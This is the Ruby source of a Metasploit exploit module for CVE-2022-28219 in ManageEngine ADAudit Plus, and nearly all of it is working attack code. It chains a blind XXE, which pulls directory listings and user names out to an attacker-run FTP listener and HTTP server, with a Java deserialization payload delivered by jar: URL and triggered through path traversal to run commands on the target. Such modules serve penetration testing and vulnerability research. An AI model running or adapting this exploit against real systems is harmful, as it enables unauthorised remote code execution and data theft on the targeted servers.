ManageEngine ADAudit Plus Path Traversal / XML Injection

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HttpServer  include Msf::Exploit::Remote::TcpServer  include Msf::Exploit::CmdStager  include Msf::Exploit::JavaDeserialization  include Msf::Handler::Reverse::Comm  def initialize(info = {})    super(      update_info(        info,        'Name' => 'ManageEngine ADAudit Plus CVE-2022-28219',        'Description' => %q{          This module exploits CVE-2022-28219, which is a pair of          vulnerabilities in ManageEngine ADAudit Plus versions before build          7060: a path traversal in the /cewolf endpoint, and a blind XXE in,          to upload and execute an executable file.        },        'Author' => [          'Naveen Sunkavally', # Initial PoC + disclosure          'Ron Bowes', # Analysis and module        ],        'References' => [          ['CVE', '2022-28219'],          ['URL', 'https://www.horizon3.ai/red-team-blog-cve-2022-28219/'],          ['URL', 'https://attackerkb.com/topics/Zx3qJlmRGY/cve-2022-28219/rapid7-analysis'],          ['URL', 'https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html'],        ],        'DisclosureDate' => '2022-06-29',        'License' => MSF_LICENSE,        'Platform' => 'win',        'Arch' => [ARCH_CMD],        'Privileged' => false,        'Targets' => [          [            'Windows Command',            {              'Arch' => ARCH_CMD,              'Platform' => 'win'            }          ],        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8081        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options([      OptString.new('TARGETURI_DESERIALIZATION', [true, 'Path traversal and unsafe deserialization endpoint', '/cewolf/logo.png']),      OptString.new('TARGETURI_XXE', [true, 'XXE endpoint', '/api/agent/tabs/agentData']),      OptString.new('DOMAIN', [true, 'Active Directory domain that the target monitors', nil]),      OptInt.new('SRVPORT_FTP', [true, 'Port for FTP reverse connection', 2121]),      OptInt.new('SRVPORT_HTTP2', [true, 'Port for additional HTTP reverse connections', 8888]),    ])    register_advanced_options([      OptInt.new('PATH_TRAVERSAL_DEPTH', [true, 'The number of `../` to prepend to the path traversal attempt', 20]),      OptInt.new('FtpCallbackTimeout', [true, 'The amount of time, in seconds, the FTP server will wait for a reverse connection', 5]),      OptInt.new('HttpUploadTimeout', [true, 'The amount of time, in seconds, the HTTP file-upload server will wait for a reverse connection', 5]),    ])  end  def srv_host    if ((datastore['SRVHOST'] == '0.0.0.0') || (datastore['SRVHOST'] == '::'))      return datastore['URIHOST'] || Rex::Socket.source_address(rhost)    end    return datastore['SRVHOST']  end  def check    # Make sure it's ADAudit Plus by requesting the root and checking the title    res1 = send_request_cgi(      'method' => 'GET',      'uri' => '/'    )    unless res1      return CheckCode::Unknown('Target failed to respond to check.')    end    unless res1.code == 200 && res1.body.match?(/<title>ADAudit Plus/)      return CheckCode::Safe('Does not appear to be ADAudit Plus')    end    # Check if it's a vulnerable version (the patch removes the /cewolf endpoint    # entirely)    res2 = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri("#{datastore['TARGETURI_DESERIALIZATION']}?img=abc")    )    unless res2      return CheckCode::Unknown('Target failed to respond to check.')    end    unless res2.code == 200      return CheckCode::Safe('Target does not have vulnerable endpoint (likely patched).')    end    CheckCode::Vulnerable('The vulnerable endpoint responds with HTTP/200.')  end  def exploit    # List the /users folder - this is good to do first, since we can fail early    # if something isn't working    vprint_status('Attempting to exploit XXE to get a list of users')    users = get_directory_listing('/users')    unless users      fail_with(Failure::NotVulnerable, 'Failed to get a list of users (check your DOMAIN, or server may not be vulnerable)')    end    # Remove common users    users -= ['Default', 'Default User', 'All Users', 'desktop.ini', 'Public']    if users.empty?      fail_with(Failure::NotFound, 'Failed to find any non-default user accounts')    end    print_status("User accounts discovered: #{users.join(', ')}")    # I can't figure out how to properly encode spaces, but using the 8.3    # version works! This converts them    users.map do |u|      if u.include?(' ')        u = u.gsub(/ /, '')[0..6].upcase + '~1'      end      u    end    # Check the filesystem for existing payloads that we should ignore    vprint_status('Enumerating old payloads cached on the server (to skip later)')    existing_payloads = search_for_payloads(users)    # Create a serialized payload    begin      # Create a queue so we can detect when the payload is delivered      queue = Queue.new      # Upload payload to remote server      # (this spawns a thread we need to clean up)      print_status('Attempting to exploit XXE to store our serialized payload on the server')      t = upload_payload(generate_java_deserialization_for_payload('CommonsBeanutils1', payload), queue)      # Wait for something to arrive in the queue (basically using it as a      # semaphor      vprint_status('Waiting for the payload to be sent to the target')      queue.pop # We don't need the result      # Get a list of possible payloads (never returns nil)      vprint_status("Trying to find our payload in all users' temp folders")      possible_payloads = search_for_payloads(users)      possible_payloads -= existing_payloads      # Make sure the payload exists      if possible_payloads.empty?        fail_with(Failure::Unknown, 'Exploit appeared to work, but could not find the payload on the target')      end      # If multiple payloads appeared, abort for safety      if possible_payloads.length > 1        fail_with(Failure::UnexpectedReply, "Found #{possible_payloads.length} apparent payloads in temp folders - aborting!")      end      # Execute the one payload      payload_path = possible_payloads.pop      print_status("Triggering payload: #{payload_path}...")      res = send_request_cgi(        'method' => 'GET',        'uri' => "#{datastore['TARGETURI_DESERIALIZATION']}?img=#{'/..' * datastore['PATH_TRAVERSAL_DEPTH']}#{payload_path}"      )      if res&.code != 200        fail_with(Failure::Unknown, "Path traversal request failed with HTTP/#{res&.code}")      end    ensure      # Kill the upload thread      if t        begin          t.kill        rescue StandardError          # Do nothing if we fail to kill the thread        end      end    end  end  def get_directory_listing(folder)    print_status("Getting directory listing for #{folder} via XXE and FTP")    # Generate a unique callback URL    path = "/#{rand_text_alpha(rand(8..15))}.dtd"    full_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{path}"    # Send the username anonymous and no password so the server doesn't log in    # with the password "Java1.8.0_51@" which is detectable    # We use `end_tag` at the end so we can detect when the listing is over    end_tag = rand_text_alpha(rand(8..15))    ftp_url = "ftp://anonymous:password@#{srv_host}:#{datastore['SRVPORT_FTP']}/%file;#{end_tag}"    serve_http_file(path, "<!ENTITY % all \"<!ENTITY send SYSTEM '#{ftp_url}'>\"> %all;")    # Start a server to handle the reverse FTP connection    ftp_server = Rex::Socket::TcpServer.create(      'LocalPort' => datastore['SRVPORT_FTP'],      'LocalHost' => datastore['SRVHOST'],      'Comm' => select_comm,      'Context' => {        'Msf' => framework,        'MsfExploit' => self      }    )    # Trigger the XXE to get file listings    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI_XXE']).to_s,      'ctype' => 'application/json',      'data' => create_json_request("<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE data [<!ENTITY % file SYSTEM \"file:#{folder}\"><!ENTITY % start \"<![CDATA[\"><!ENTITY % end \"]]>\"><!ENTITY % dtd SYSTEM \"#{full_url}\"> %dtd;]><data>&send;</data>")    )    if res&.code != 200      fail_with(Failure::Unknown, "XXE request to get directory listing failed with HTTP/#{res&.code}")    end    ftp_client = nil    begin      # Wait for a connection with a timeout      select_result = ::IO.select([ftp_server], nil, nil, datastore['FtpCallbackTimeout'])      unless select_result && !select_result.empty?        print_warning("FTP reverse connection for directory enumeration failed - #{ftp_url}")        return nil      end      # Accept the connection      ftp_client = ftp_server.accept      # Print a standard banner      ftp_client.print("220 Microsoft FTP Service\r\n")      # We need to flip this so we can get a directory listing over multiple packets      directory_listing = nil      loop do        select_result = ::IO.select([ftp_client], nil, nil, datastore['FtpCallbackTimeout'])        # Check if we ran out of data        if !select_result || select_result.empty?          # If we got nothing, we're sad          if directory_listing.nil? || directory_listing.empty?            print_warning('Did not receive data from our reverse FTP connection')            return nil          end          # If we have data, we're happy and can break          break        end        # Receive the data that's waiting        data = ftp_client.recv(256)        if data.empty?          # If we got nothing, we're done receiving          break        end        # Match behavior with ftp://test.rebex.net        if data =~ /^USER ([a-zA-Z0-9_.-]*)/          ftp_client.print("331 Password required for #{Regexp.last_match(1)}.\r\n")        elsif data =~ /^PASS /          ftp_client.print("230 User logged in.\r\n")        elsif data =~ /^TYPE ([a-zA-Z0-9_.-]*)/          ftp_client.print("200 Type set to #{Regexp.last_match(1)}.\r\n")        elsif data =~ /^EPSV ALL/          ftp_client.print("200 ESPV command successful.\r\n")        elsif data =~ /^EPSV/ # (no space)          ftp_client.print("229 Entering Extended Passive Mode(|||#{rand(1025..1100)})\r\n")        elsif data =~ /^RETR (.*)/m          # Store the start of the listing          directory_listing = Regexp.last_match(1)        else          # Have we started receiving data?          # (Disable Rubocop, because I think it's way more confusing to          # continue the elsif train)          if directory_listing.nil? # rubocop:disable Style/IfInsideElse            # We shouldn't really get here, but if we do, just play dumb and            # keep the client talking            ftp_client.print("230 User logged in.\r\n")          else            # If we're receiving data, just append            directory_listing.concat(data)          end        end        # Break when we get the PORT command (this is faster than timing out,        # but doesn't always seem to work)        if !directory_listing.nil? && directory_listing =~ /(.*)#{end_tag}/m          directory_listing = Regexp.last_match(1)          break        end      end    ensure      ftp_server.close      if ftp_client        ftp_client.close      end    end    # Handle FTP errors (which thankfully aren't as common as they used to be)    unless ftp_client      print_warning("Didn't receive expected FTP connection")      return nil    end    if directory_listing.nil? || directory_listing.empty?      vprint_warning('FTP client connected, but we did not receive any data over the socket')      return nil    end    # Remove PORT commands, split at \r\n or \n, and remove empty elements    directory_listing.gsub(/PORT [0-9,]+[\r\n]/m, '').split(/\r?\n/).reject(&:empty?)  end  def search_for_payloads(users)    return users.flat_map do |u|      dir = "/users/#{u}/appdata/local/temp"      # This will search for the payload, but right now just print stuff      listing = get_directory_listing(dir)      unless listing        vprint_warning("Couldn't get directory listing for #{dir}")        next []      end      listing           .select { |f| f =~ /^jar_cache[0-9]+.tmp$/ }           .map { |f| File.join(dir, f) }    end  end  def upload_payload(payload, queue)    t = framework.threads.spawn('adaudit-payload-deliverer', false) do      c = nil      begin        # We use a TCP socket here so we can hold the socket open after the HTTP        # conversation has concluded. That way, the server caches the file in        # the user's temp folder while it waits for more data        http_server = Rex::Socket::TcpServer.create(          'LocalPort' => datastore['SRVPORT_HTTP2'],          'LocalHost' => srv_host,          'Comm' => select_comm,          'Context' => {            'Msf' => framework,            'MsfExploit' => self          }        )        # Wait for the reverse connection, with a timeout        select_result = ::IO.select([http_server], nil, nil, datastore['HttpUploadTimeout'])        unless select_result && !select_result.empty?          fail_with(Failure::Unknown, "XXE request to upload file did not receive a reverse connection on #{datastore['SRVPORT_HTTP2']}")        end        # Receive and discard the HTTP request        c = http_server.accept        c.recv(1024)        c.print "HTTP/1.1 200 OK\r\n"        c.print "Connection: keep-alive\r\n"        c.print "\r\n"        c.print payload        # This will notify the other thread that something has arrived        queue.push(true)        # This has to stay open as long as it takes to enumerate all users'        # directories to find then execute the payload. ~5 seconds works on        # a single-user system, but I increased this a lot for production.        # (This thread should be killed when the exploit completes in any case)        Rex.sleep(60)      ensure        http_server.close        if c          c.close        end      end    end    # Trigger the XXE to get file listings    path = "/#{rand_text_alpha(rand(8..15))}.jar!/file.txt"    full_url = "http://#{srv_host}:#{datastore['SRVPORT_HTTP2']}#{path}"    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI_XXE']).to_s,      'ctype' => 'application/json',      'data' => create_json_request("<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE data [<!ENTITY % xxe SYSTEM \"jar:#{full_url}\"> %xxe;]>")    )    if res&.code != 200      fail_with(Failure::Unknown, "XXE request to upload payload failed with HTTP/#{res&.code}")    end    return t  end  def serve_http_file(path, respond_with = '')    # do not use SSL for the attacking web server    if datastore['SSL']      ssl_restore = true      datastore['SSL'] = false    end    start_service({      'Uri' => {        'Proc' => proc do |cli, _req|          send_response(cli, respond_with)        end,        'Path' => path      }    })    datastore['SSL'] = true if ssl_restore  end  def create_json_request(xml_payload)    [      {        'DomainName' => datastore['domain'],        'EventCode' => 4688,        'EventType' => 0,        'TimeGenerated' => 0,        'Task Content' => xml_payload      }    ].to_json  endend